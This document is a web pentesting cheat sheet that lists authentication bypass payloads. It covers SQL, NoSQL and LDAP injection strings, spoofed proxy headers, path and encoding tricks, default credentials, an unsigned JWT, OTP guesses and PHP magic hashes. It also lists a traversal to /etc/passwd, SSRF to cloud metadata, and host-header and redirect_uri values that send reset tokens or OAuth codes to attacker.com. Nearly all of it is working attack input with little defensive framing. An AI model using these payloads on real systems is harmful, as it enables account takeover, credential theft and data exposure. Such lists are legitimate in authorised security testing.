# Authentication Bypass Payloads

# SQL injection authentication bypass
admin' --
admin' #
admin'/*
' OR '1'='1' --
' OR 1=1--
admin' OR '1'='1
') OR ('1'='1
' OR 'x'='x
admin') OR ('1'='1'--

# NoSQL authentication bypass
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$gt": ""}}

# JSON payload manipulation
{"username":"admin","password":"admin","role":"admin"}
{"username":"admin","password":"wrong","isAdmin":true}
{"username":"admin","is_authenticated":true}

# Session manipulation
PHPSESSID=admin
session_id=00000000-0000-0000-0000-000000000001
token=admin_token
auth=true

# Parameter pollution
username=attacker&username=admin
user=normal&user=admin

# Cookie manipulation
admin=true
isAdmin=1
role=admin
authenticated=true
user_level=admin

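# Spoofed proxy and URL-override headers (not CRLF header injection; effective only where the app trusts client-supplied values instead of ones set by its own reverse proxy)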
X-Forwarded-For: 127.0.0.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Host: localhost
X-Forwarded-Host: localhost

# URL path manipulation
/admin/..;/
/admin/%2e%2e%3b/
/./admin/./
/admin;/
/admin..
//admin//
/./admin/./panel
/%2e/admin
/admin/~
/admin#
/admin?

# HTTP verb tampering
GET /admin
POST /admin
HEAD /admin
PUT /admin
DELETE /admin
OPTIONS /admin
TRACE /admin
PATCH /admin

# Case manipulation
/Admin
/ADMIN
/AdMiN
/aDmIn

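# Overlong UTF-8 encodings (%c0%af and %e0%80%af for "/", %c0%ae for ".") and plain percent-encoding (%61 for "a"); a strict UTF-8 decoder rejects the overlong forms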
/admin%c0%af
/admin%e0%80%af
/admin%c0%ae%c0%ae/
/%61dmin

# Double encoding
/%252e%252e%252fadmin
/%252e%252e/admin

# Null byte injection
/admin%00
/admin%00.html
/admin%00.jpg

# Default and weak credential pairs (password guessing; credential stuffing proper replays breached username:password pairs)
admin:admin
administrator:administrator
root:root
admin:password
admin:123456
admin:admin123
test:test
guest:guest
user:user
demo:demo

# Empty, blank and wildcard password values
username=admin&password=
username=&password=
username=admin&password=%20
username=admin&password=*

# Password reset bypass
email=victim@example.com&email=attacker@example.com
token=&email=attacker@example.com
token=0
token=null
token=false
token=undefined
token=%20
token=true
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com

# Password reset token manipulation
reset_token=' OR '1'='1
reset_token={"$gt": ""}
reset_token=*
reset_token=admin'--
user_id=1&token=valid_token
user_id=999&token=valid_token

# Host header injection for password reset poisoning
Host: attacker.com
X-Forwarded-Host: attacker.com
X-Host: attacker.com

# Password reset without verification
new_password=Pass123&confirm_password=Pass123
# (without providing reset token or current password)

# Password reset endpoint enumeration
POST /api/password/reset
POST /api/v1/auth/password-reset
POST /password-reset
POST /forgot-password
POST /reset-password
PUT /api/users/password
PATCH /account/password

# Weak token brute force
token=000000
token=111111
token=123456
token=0000
token=1234

# Bypass email verification in reset
email_verified=true
verified=true
skip_verification=true

# OTP/2FA bypass
otp=000000
otp=123456
otp=111111
otp=
otp=%20
otp=null

# Response manipulation
# Change HTTP response from 401/403 to 200
# Change "authenticated": false to "authenticated": true
# Change "role": "user" to "role": "admin"

# JWT manipulation: unsigned token with "alg":"none", plus null and empty bearer values (see JWT-Vulnerabilities for more)
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
Authorization: Bearer null
Authorization: Bearer 
Authorization: 

# GraphQL authentication bypass
{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
{"query":"{users{id username password}}"}

# XML authentication bypass
<user><username>admin</username><password>' OR '1'='1</password></user>

# LDAP authentication bypass
username=*
username=admin)(|(password=*
username=*)(uid=*))(|(uid=*

# OAuth/OIDC bypass
redirect_uri=https://attacker.com
state=
nonce=
code=

# API key bypass
api_key=
X-API-Key: 
Authorization: 
apikey=null

# Session fixation
PHPSESSID=attacker_controlled_session
jsessionid=12345

# CAPTCHA bypass
captcha=
g-recaptcha-response=
h-captcha-response=
captcha_response=03AAYGu2...
recaptcha=

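# Rate limiting bypass (applies when the limiter keys on client-supplied IP headers rather than the connection's peer address)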
X-Forwarded-For: random_ip_each_request
X-Originating-IP: random_ip_each_request
X-Remote-IP: random_ip_each_request

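# Account enumeration (existing vs. unknown username; response body, status code and timing should be identical for both)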
username=admin&password=wrong
username=nonexistent&password=wrong

# Login form variations
user[admin]=1
user[role]=admin
username[]=admin
password[]=anything

# Client-supplied time and validity parameters
wait_for_rate_limit=true
timestamp=future_date
valid_until=9999999999

# Magic hashes (PHP type juggling)
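# 0e215962017 == 0 and its MD5, 0e291242476940776845150308577824, == 0 under PHP loose comparison (==)
# Comparing hashes with === or hash_equals() keeps 0e<digits> strings from being read as numbers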
password=0e215962017
password=240610708

# Unicode normalization
username=ⓐⓓⓜⓘⓝ
username=𝒶𝒹𝓂𝒾𝓃
username=ａｄｍｉｎ

# Homograph attack
username=αdmin (Greek alpha)
username=аdmin (Cyrillic а)

# Whitespace bypass
username= admin
username=admin 
username=%20admin
username=admin%20

# Special characters
username=admin'
username=admin"
username=admin`
username=admin\

# Email bypass for authentication
email=admin@localhost
email=admin@127.0.0.1
email=@example.com
email=victim@attacker.com

# Host header authentication bypass
Host: localhost
Host: 127.0.0.1
Host: internal.company.com

# Referer bypass
Referer: https://trusted-site.com
Referer: https://localhost

# Origin bypass
Origin: https://trusted-site.com
Origin: null

# Authentication via GET instead of POST
GET /api/login?username=admin&password=admin123

# Path traversal / local file inclusion (discloses files such as /etc/passwd; not an authentication bypass in itself)
/etc/passwd
../../../../../../etc/passwd

# SSRF to bypass authentication
url=http://localhost/admin
url=http://127.0.0.1/admin
url=http://169.254.169.254/latest/meta-data/

# Request smuggling for authentication bypass
Content-Length: 0
Transfer-Encoding: chunked

# Race conditions
# Send multiple authentication requests simultaneously

# Business logic bypass
step=1&step=3
status=pending&status=approved
verified=false&verified=true

# Broken authentication chain
# Skip step 2 in multi-step authentication
# Reuse old session tokens
# Replay old authentication requests
